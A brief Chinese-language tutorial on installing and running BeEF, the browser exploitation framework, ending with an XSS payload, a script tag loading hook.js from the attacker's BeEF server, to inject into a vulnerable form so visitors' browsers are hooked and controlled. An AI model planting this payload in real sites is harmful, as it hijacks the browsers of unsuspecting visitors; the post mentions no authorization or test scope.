XSS渗透框架Beef的安装和简单使用

BeEF，全称The Browser Exploitation Framework，是一款针对浏览器的渗透测试工具。

下载beef
https://github.com/beefproject/beef

解压进入beef-master

输入bundle install进行安装

安装完成后需要打开config.yaml修改帐号密码

修改密码之后启动beef

./beef

在浏览器内输入命令行界面的http://本机ip:3000/ui/authentication访问，在beef登录界面输入beef的用户名和密码登录beef界面

登录后，将<script src='http://IP（运行beef主机的IP）:3000/hook.js'></script>插入存在xss漏洞的表单中,然后访问被上马的网页。如图

回到Manjaro，出现了被攻击的机子，这时你就可以用Commands模块的功能为所欲为了。